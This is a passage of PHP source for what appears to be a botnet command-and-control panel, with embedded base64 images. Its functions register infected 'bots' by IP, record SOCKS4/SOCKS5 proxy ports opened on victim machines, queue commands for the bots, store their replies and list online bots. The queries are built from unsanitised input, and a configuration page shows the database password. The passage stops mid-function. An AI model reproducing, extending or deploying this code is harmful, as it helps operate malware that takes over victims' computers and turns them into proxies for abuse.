AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCjw/eHBhY2tldCBlbmQ9J3cnPz7/7gAOQWRvYmUAZEAAAAAB/9sAhAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAgICAgICAgICAgIDAwMDAwMDAwMDAQEBAQEBAQEBAQECAgECAgMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP/wAARCAAUAAoDAREAAhEBAxEB/90ABAAC/8QBogAAAAYCAwEAAAAAAAAAAAAABwgGBQQJAwoCAQALAQAABgMBAQEAAAAAAAAAAAAGBQQDBwIIAQkACgsQAAIBAwQBAwMCAwMDAgYJdQECAwQRBRIGIQcTIgAIMRRBMiMVCVFCFmEkMxdScYEYYpElQ6Gx8CY0cgoZwdE1J+FTNoLxkqJEVHNFRjdHYyhVVlcassLS4vJkg3SThGWjs8PT4yk4ZvN1Kjk6SElKWFlaZ2hpanZ3eHl6hYaHiImKlJWWl5iZmqSlpqeoqaq0tba3uLm6xMXGx8jJytTV1tfY2drk5ebn6Onq9PX29/j5+hEAAgEDAgQEAwUEBAQGBgVtAQIDEQQhEgUxBgAiE0FRBzJhFHEIQoEjkRVSoWIWMwmxJMHRQ3LwF+GCNCWSUxhjRPGisiY1GVQ2RWQnCnODk0Z0wtLi8lVldVY3hIWjs8PT4/MpGpSktMTU5PSVpbXF1eX1KEdXZjh2hpamtsbW5vZnd4eXp7fH1+f3SFhoeIiYqLjI2Oj4OUlZaXmJmam5ydnp+So6SlpqeoqaqrrK2ur6/9oADAMBAAIRAxEAPwDcRHTmbYXEbfT/AFJ/1v8Affj2J/3jF0QfRSddf6HM5/xxb+v6T9ffv3hF1r6KT06//9Df20r/AKlf9sPfuvde0L/qV/2w/wCKe91Pr17r/9Hf49+691737r3X/9k=";
$img3 =
"R0lGODlhkwAeAMQAAAAAAP///7CI/9K7//Tu/1UA/2AR/2wi/3cz/4JE/45V/5lm/6R3/7uZ/8aq/93M/+jd/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAABEALAAAAACTAB4AAAX/YCCOZGmeaKqubOu+MCsUdJGINR3vfO8HiZyt8UPNaogAQVhsOptBYUHAagiuEBlzwHx6v66o0MASD7S5ADcNbrtLYuFZZUbXBsfayIGgKeYPCYIMDwcFDCMECwYFBwIEIgRBCRAMgjciAoaOJpYJiIGCD0qLBQgOI5c3qgENlw0PCiRmYlSkjKeRfTQCWbE0CLaZcnk6AQ5So2s2hjRzuzWyAXnQBSIMQgslRzfLInEFRAFpaXkCBpjfd+bqOUTLvA+MOYjD7gtdzTndUryt/WfA6YEAkEQeNXoaSDEAiZyePIbSAVlXg4rCMQTgTcEnJcs0IQKCzLO2TEGaZQZM/9JYRQNdxXHRytUQU0+EN28cbbx0qKOYjVkU/eWspVETMGi28gRh0EfMR2diICxLMDXAPKo1tPG0hs3ZTBIEaUA4ksRMVpg6ZO4D6qxruIleaWirU5HdU51RnOYZYGZq1Zl/9aQx27JE0Bs5Aqd9KESiGGgGsiT+SpeXXaU6C6i0trcv4K+fV6K1NvgOmxG7HHAbrZg047WppCCYM1l05SGv7E0pMO/gXn0D/IJeefHnVrimTotQeUUu6+GLe9YwMCf2GHG1f9bRp21bxRwHR0CIEzz0zxHnoLvWIdAYesv+siMW/LpAd7YYn9u+EyCnDUjv8TJdeNOM5IxwogUwXv9jozXYnjUkXCRIfKaJdpxd+A2w2RnyIXcGBAYaMIpuU4Xn3x0I/iSPFPNFZ40YC1xxRQlrTDiFfsbRJ50/cAR1Y4d1qBEigHvNdNADM3m2UlWbKdVgac48EFx1kdBwQBQcVpiji3cJY10BeOykJUvOjLDiS3ch6YdvNbiConktHtCag3c4ZdhKZXZ4IZoZsgMkf4lAI81BddXH15tLQoeVhTq+WKcePSYHJo4trscZn1+GSWFc2vGXgwPNYEIofDuCqaQNii3600j6OAoVpCSciMOYT9bnZTtg+knrbaYmeNA8Vhh6qqotEhvAZkzkdChvJvgkwkjLaNVolybQ8hL5tGfxuqyoemDJJi/ApRink8gAo9YUV5lQLqQ0iUlDcZfyiB9IyLlFRS0PINVMdwd5m1A/YIobQKtfHZPAAksM1I84JMCDiVs5ZEGwrdUCfAbENWSB7MEL69afWAeFZSWiqH6Vkz43yEgEG8g2AuCdCYKYjQgnn3srcjmQoaCB9okAbwJnTkfka3ddQ4MlJBtbCG/FxVncAZGcPGKE/tUEajQAykydzRU3NvXVfrzMQLpLWzk1DBCc/cIAL3+Zw31KDKC222+RIKVHiQyA9xd3tyDl3G9UsdDeK8SRROCIJ/5CeisBnoInn7St+OSU06h35Zhnrvnmk4cAADs=";
$img4 =
"R0lGODlhRgAKAPcAAAAAAP///5uX35yX356Z4JyY35uX3p6a4J6a36Cc4KKe4aOe4aKe4KOf4KSg4aWg4aWh4aej4qej4aml4rKv5baz5Z2a4J2a36Kf4aKf4KSh4aaj4qak4qek4qaj4ail4qim4qmm4qqo46uo46yq5K2q5Kuo4q2q462r46+s5K+t5LGv5a+t47Gv5LOx5bWz5rWz5ba05bi25rq45ry656yr47Gw5LOy5bOy5LW05rW05be25rm457m45rq557q55ry76Ly757696L6958C/6MLB6cLB6MTD6be35rm55ru757296L+/6b2957+/6MDA6MHB6MLC6cPD6cLC6MTE6cbG6sjI6srK6r/A6MHC6MPE6sPE6cXG6sXG6cfI6snK68nK6svM683O7M3O68/Q7NHS7c/Q69HS7NPU7cfJ6snL68zO7MvN683P7M7Q7M3P69DS7dDS7NLU7dHT7NLU7NTW7tTW7dbY7s7R7NDT7dfZ7tbY7dnb79ja7tnb7tLV7dPW7dXY7tfa79XY7djb79fa7t7g8NPX7dnc79jb7trd79nc7tzf8Nve79jc793g8Nzf79/i8d3g7+Dj8d/i8Njc7tvf8Nre79vf7+Dj8OLl8d3h8N/j8d3h7+Pm8eLl8ODk8d/j8ODk8OHl8eLm8ejr897j8OTo8uPn8eLm8OHm8eXp8uTo8eLn8ebq8uXp8eTp8uPo8ejs8+Xq8ujs8ufs8+br8ujt8+fs8unu8+jt8urv8+nu8v///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAL0ALAAAAABGAAoAAAj/AAdcSIBBAwcQI06oWHFDx44eQYQ4iaKlShowYda4iYPGTiA9iRRBemRK1KdWrFa5qqUr166XMGPKnBlzAIIECjRs+GCChIoWOBz+UDKEiJEtXKxgHEMmjhxAgQo5agRpEyVQo1DBemULV0uaYMPuMjCwAYQNCE+waHEjBpIfQIQQiYLUy5cwbdzM+VMnUB9CiixZnTTKU8quX8UqhilgIAMNHkIkTMEQxg4eNCRGoZIUDJs3TeX0LZToEiRJlERpQnVqli1aungtnj3AAkEIEj6MQLHwxovLSoQ8mbLF4hc2TPP8ATRIECKRnUKJGtUq1ipbsm65nK14AIEECyB43gAhgjcFFzFk8IjopAjni2HE4IFDx2MhPiKtYkXpGtct2dyJVcABCWSgQQc81ZACWzrIkEQQQzCRhRRdWHEXU2csN0ghlSjCiCFXrcbKK674t12AYHmHk04TmFDDTzfksMMMQSyBBXEVXsGGGGSUIcchGz5XFSWZjEJKayvFhmJYAoH3QASS8baCCxU8REMTTkxBoV14meGUHXvoscglmGwSSSaq8NeVdkuCJcB3CjgQmQklsGCDCzL6oASWUBzRhRdqxOfGGXLYcYcefpC5CSeipIIKK66VIsuJbcYUEAA7";
$img5 =
"R0lGODlhRgAKAPcAAAAAAP////6Ehf6Gh/2Gh/6Iif2Iif2Ki/2Mjf2NjvyNjv2PkPyPkPyRkvyRk/ySk/uSk/uUlfuUlvuXmPqXmPqXmfqam/qcnvqdnvmdnvmfofmgofmjpPmjpfijpPimp/emp/epqvetrvatrvawsfaztPWztPS2t/W6u/S6u/S9vvO9vvPAwfimqPemqPipq/epq/esrvasrvavsfawsvWytPWytfaztfW2uPS2uPW5u/S5u/S6vPS8vvO8vvO9v/PAwvPDxfLDxfLGyPHGyPW1uPS1uPW5vPS8v/O8v/O/wvPCxfLCxfLGyfHJy/HNz/DMzvLCxvHJzPHMz/DMz/DP0u7Y2vDS1e/S1e/V2O7b3e7V2O/Y2+7Y2+7e4O7a3e7b3u/X2+7X2+3b3u7d4O7a3u3a3u3d4O3e4e3g4+7d4e3d4ezg4+3i5e3f4+zi5ezl5+3g5O3k5+3i5uzi5uzl6Ozk6Ozn6uzm6uvn6uvm6uzm6+vm6+vn6+zp7Ovo7Ovp7Ovq7uvq7+rq7+vr7uvs8Ovt8urs8Ort8urt8eru8urv8/6EhP6Fhf6Ghv6Hhv6Hh/6IiP6JiP2IiP2Jif2Li/2NjfyNjfyQkPySkvuSkvyVlfuVlfuYmPiqqveqqv///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAKAALAAAAABGAAoAAAj/AAU4MnDAEgMIEihYyLCBQwsYIkjUwHEEiRImTaRMqYIlS5gyXti0saPnT6BCiRapXMmypcuXKhsNoHQgASYIESZYwLDBAwgYMmbcOJHihxIhGTdeyWLFzJo0dOzkAXQSEcyrWFcKgBSp0iVMmjjpvNDQRYgRM0zg2OFDSZCkVZaKKYMmzhs7ewARKqQoq9+XMgt4ZZBJ7M6eLTzFmGGjiI4eFzNS4bily5gzbubYuUP1kKG/oLVCknRAAYMHETod7vAB6IwSa9tGIaKRYxYuWp6+qXPHzyCUoUMLeCQYwcEIChlyAPFpcQkjO1QcHVK7Y5cyatzQkdPnj6BDKYP/j90qOAEDB4aVg3ghIi30FUCQOpls/QsZqHDymOQr/i8jApNUksACOFVwmAcfhCADCSYQ1ZZ8G3UkBhhPjYSHXof01V9WMlEyWCbI7aSBBy0oSEMJRaDwAwtLNOHEE7bNdV9UeQUC3oZZbeWhaQ1sohBPCAJFwg058JAEC29JAUVcWXShhRpQ1cGHd/zheFVAADs=";

if (isset( $_GET["img"] )) $img = $_GET["img"]; else $img = "";
switch ($img)
{
case 1:
	header( "Content-Type: image/gif" );
	die( base64_decode( $img1 ) );
case 2:
	header( "Content-Type: image/gif" );
	die( base64_decode( $img2 ) );
case 3:
	header( "Content-Type: image/gif" );
	die( base64_decode( $img3 ) );
case 4:
	header( "Content-Type: image/gif" );
	die( base64_decode( $img4 ) );
case 5:
	header( "Content-Type: image/gif" );
	die( base64_decode( $img5 ) );
default: break;
}

function view_config()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table, $refreshtime;
	
	$msg = "<table width=\"100%\" border=\"0\" class=\"table\"><tr><th background=\"?img=2\" colspan=\"2\" scope=\"row\">Configuration (<a href=\"javascript:window.close();\">close</a>)</th></tr><tr><th class=\"tableitem\" width=\"19%\" scope=\"row\">MySQL host:</th><td class=\"tableitem\" width=\"81%\">$mysql_host</td></tr><tr><th class=\"tableitem\" scope=\"row\">MySQL user:</th><td class=\"tableitem\">$mysql_user</td></tr><tr><th class=\"tableitem\" scope=\"row\">MySQL password:</th><td class=\"tableitem\">$mysql_password</td></tr><tr><th class=\"tableitem\" scope=\"row\">MySQL database:</th><td class=\"tableitem\">$mysql_dbname</td></tr><tr><th class=\"tableitem\" scope=\"row\">MySQL bots table:</th><td class=\"tableitem\">$mysql_bots_table</td></tr><tr><th class=\"tableitem\" scope=\"row\">Fresh time:</th><td class=\"tableitem\">$refreshtime</td></tr></table>";
	return $msg;
}

function db_install()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;
	if (!mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "Couldnot connect to database. Check MySQL host.";
		
//	if (!mysql_query( "DROP DATABASE IF EXISTS $mysql_dbname" )) die( "MySQL error. Check your login/password for MySQL." );
//	mysql_query( "CREATE DATABASE $mysql_dbname" );
	mysql_select_db( $mysql_dbname );
	mysql_query( "DROP TABLE IF EXISTS $mysql_bots_table" );
	if (!mysql_query( "CREATE TABLE $mysql_bots_table (time int, ip varchar(32), nickname varchar(64), msg_in varchar(255), msg_out text, status int, socks4 int, socks5 int );" ))
		die( "MySQL error. Check your login/password for MySQL" );
		
	mysql_close();
	
	return "Installation completed<br>Click <a href=\"?\"><b>here</b></a>";
}

function db_clear()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;
	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "Cannot connect to database";

	mysql_select_db( $mysql_dbname );
	
	mysql_query( "DELETE FROM $mysql_bots_table" );
	
	mysql_close();
}

function cutstr( $str, $len )
{
	if (!isset( $str[$len] )) return $str;
	$str = substr( $str, 0, $len );
	$str[$len-2] = $str[$len-1] = $str[$len] = ".";
	return $str;
}

/* Online bots listing */
function db_list_bots()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table, $refreshtime;
	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
	{
		print "<center><b>MySQL connection error</b></center>";
		return 0;
	}
	mysql_select_db( $mysql_dbname );

	$r = mysql_query( "SELECT * FROM $mysql_bots_table" );

	$count = 1;
	while ($r && $arr = mysql_fetch_array( $r ))
	{
		$time = $arr["time"];
		$ago = time() - $time;
		$ip = $arr["ip"];
		$nickname = cutstr( $arr["nickname"], 12 );
		$fullnickname = $arr["nickname"];
		$message = cutstr( $arr["msg_out"], 55 );
		$command = cutstr( $arr["msg_in"], 20 );
		$status = $arr["status"];
		$socks4_port = $arr["socks4"];
		$socks5_port = $arr["socks5"];
		if (!$socks4_port) $socks4_port = "x";
		if (!$socks5_port) $socks5_port = "x";
		
		/* highlighting */
		if ($status) $c_class = "tableitem"; else $c_class = "tableitem2";
		if ($status) $m_class = "tableitem2"; else $m_class = "tableitem";
		if ($status)
			$nickref = "<td class=\"tableitem\"><a title=\"Add nick\" href=\"javascript:addn('$fullnickname');\">$nickname</a></td>";
		else
			$nickref = "<td class=\"tableitem\"><i>$nickname</i></a></td>";
		if ($status)
			$message = "<u>".$message."</u>";
		else
			$command = "<u>".$command."</u>";
		
		print "<tr align=\"center\">".
			  "<td><a title=\"Show only this item\" href=\"javascript:win('?act=viewfull&nickname=$fullnickname',600,150);\">$count</a></td><td>$ago s. ago</td>".
			  "<td class=\"tableitem\"><a title=\"Whois this IP\" href=\"http://ripe.net/fcgi-bin/whois?form_type=simple&full_query_string=&searchtext=$ip&submit.x=0&submit.y=0&submit=Search\">$ip</a></td>".
			  $nickref.
			  "<td class=\"$c_class\"><b>$command</b></td>".
			  "<td class=\"$m_class\"><b>$message</b></td>".
			  "<td class=\"tableitem3\"><b>$socks4_port</b></td>".
			  "<td class=\"tableitem3\"><b>$socks5_port</b></td>".
			  "</tr>";
		$count++;
	}
	print "</table>";
	if ($count == 1) print "<center><b>No Bots Online</b></center>";
	
	mysql_close();
	return 1;
}

function db_num()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "[couldnot connect to MySQL]";
	mysql_select_db( $mysql_dbname );

	$r = mysql_query( "SELECT COUNT(*) FROM $mysql_bots_table" );
	$arr = mysql_fetch_array( $r );

	mysql_close();
	if ($arr && $arr["COUNT(*)"]) return $arr["COUNT(*)"]; else return 0;
}

function db_ans()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "[couldnot connect to MySQL]";
	mysql_select_db( $mysql_dbname );

	$r = mysql_query( "SELECT COUNT(*) FROM $mysql_bots_table WHERE status=1" );
	$arr = mysql_fetch_array( $r );

	mysql_close();
	if ($arr && $arr["COUNT(*)"]) return $arr["COUNT(*)"]; else return 0;
}

function db_s5_num()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "[couldnot connect to MySQL]";
	mysql_select_db( $mysql_dbname );

	$r = mysql_query( "SELECT COUNT(*) FROM $mysql_bots_table WHERE socks5>0" );
	$arr = mysql_fetch_array( $r );

	mysql_close();
	if ($arr && $arr["COUNT(*)"]) return $arr["COUNT(*)"]; else return 0;
}

function db_s4_num()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "[couldnot connect to MySQL]";
	mysql_select_db( $mysql_dbname );

	$r = mysql_query( "SELECT COUNT(*) FROM $mysql_bots_table WHERE socks4>0" );
	$arr = mysql_fetch_array( $r );

	mysql_close();
	if ($arr && $arr["COUNT(*)"]) return $arr["COUNT(*)"]; else return 0;
}

function db_not_ans()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "[couldnot connect to MySQL]";
	mysql_select_db( $mysql_dbname );

	$r = mysql_query( "SELECT COUNT(*) FROM $mysql_bots_table WHERE status=0" );
	$arr = mysql_fetch_array( $r );

	mysql_close();
	if ($arr && $arr["COUNT(*)"]) return $arr["COUNT(*)"]; else return 0;
}

/* add/update DB record about bot */
function db_bot_online( $nickname, $mo, $socks4_port, $socks5_port )
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table, $HTTP_ENV_VARS;
	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "400";

	mysql_select_db( $mysql_dbname );

	$time = time();
	$ip = $_SERVER["REMOTE_ADDR"];
	$msg_out = str_replace( "\\", "\\\\", $mo );
	$msg_out = htmlspecialchars( $msg_out );


	$r = mysql_query( "SELECT time, status, ip, msg_in FROM $mysql_bots_table WHERE ip=\"$ip\"" );
	$msg_in = get_new_cmd();
	if ($arr = mysql_fetch_array( $r ))
	{
		$msg_in = $arr["msg_in"];
		$status = $arr["status"];
		$t      = $arr["time"];
		$fetched = 1;
	}
	else
		$fetched = 0;

	if ($msg_out == "")
		if ($fetched)
			mysql_query( "UPDATE $mysql_bots_table SET time=$time,nickname=\"$nickname\",socks4=$socks4_port,socks5=$socks5_port WHERE ip=\"$ip\"" );
		else
		{
			if ($msg_in) $st = 0; else $st = 1;
			mysql_query( "INSERT INTO $mysql_bots_table VALUES($time, \"$ip\", \"$nickname\", \"$msg_in\", \"\", $st, $socks4_port, $socks5_port)" );
			$status = $st;
		}
	else
	{
		if ($fetched)
			mysql_query( "UPDATE $mysql_bots_table SET time=$time,status=1,msg_out=\"$msg_out\",nickname=\"$nickname\",socks4=$socks4_port, socks5=$socks5_port WHERE ip=\"$ip\"" );
/*		else
		{
			if ($msg_in) $st = 0; else $st = 1;
			mysql_query( "INSERT INTO $mysql_bots_table VALUES($time, \"$ip\", \"$nickname\", \"$msg_in\", \"$msg_out\", $st, $socks4_port, $socks5_port)" );
		}*/
		$status = 1;
	}
			
	if ($msg_out == "" && $status == 0) $ret = "100 ".$msg_in; else $ret = "500";
	
	mysql_close();
	return $ret;
}

/* updates DB */
function db_update()
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table, $refreshtime;
	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "Cannot connect to database";		
	mysql_select_db( $mysql_dbname );
	
	$r = mysql_query( "SELECT time, nickname FROM $mysql_bots_table" );
	while ($r && $arr = mysql_fetch_array( $r ))
	{
		$time = $arr["time"];
		$nickname = $arr["nickname"];
		if (time() - $time > $refreshtime)
			mysql_query( "DELETE FROM $mysql_bots_table WHERE nickname=\"$nickname\"" );
	}

	mysql_close();

	return 1;
}

/* print full info about bot */
function db_bot_viewfull( $nickname )
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;
	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "Cannot connect to database";		
	mysql_select_db( $mysql_dbname );
	
	$r = mysql_query( "SELECT * FROM $mysql_bots_table WHERE nickname=\"$nickname\"" );
	if ($r && $arr = mysql_fetch_array( $r ))
	{
		$time = $arr["time"];
		$ago = time() - $time;
		$ip = $arr["ip"];
		$msg_in = $arr["msg_in"];
		$msg_out = $arr["msg_out"];
		$status = $arr["status"];
		
		$ret = "<script>document.title='$nickname';</script><table width=\"100%\" border=\"0\" class=\"table\"><tr><th background=\"?img=2\" colspan=\"2\" scope=\"row\">Full View (<a href=\"javascript:window:close();\">close</a>)</th></tr><tr><th class=\"tableitem\" width=\"19%\" scope=\"row\">Last Time</th><td class=\"tableitem\" width=\"81%\">$ago seconds ago</td></tr><tr><th class=\"tableitem\" scope=\"row\">IP</th><td class=\"tableitem\">$ip</td></tr><tr><th class=\"tableitem\" scope=\"row\">Nickname</th><td class=\"tableitem\">$nickname</td></tr><tr><th class=\"tableitem\" scope=\"row\">Command</th><td class=\"tableitem\">$msg_in</td></tr><tr><th class=\"tableitem\" scope=\"row\">Response</th><td class=\"tableitem\">$msg_out</td></tr></table>";
		return $ret;
	}
	else
		return "<center>No data. Seems, bot in offline or not exist.<br><br>";

	mysql_close();
	return 1;
}

/* set task */
function db_bot_settask( $nickname, $msg_in  )
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;
	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "Cannot connect to database";		
	mysql_select_db( $mysql_dbname );
	
	/* split by "," */
	$names = split( ",", $nickname );
	
	foreach ($names as $n)
		if ($n != "" && $n != " ")
			mysql_query( "UPDATE $mysql_bots_table SET status=0,msg_in=\"$msg_in\" WHERE nickname=\"$n\" AND status=1" );
	
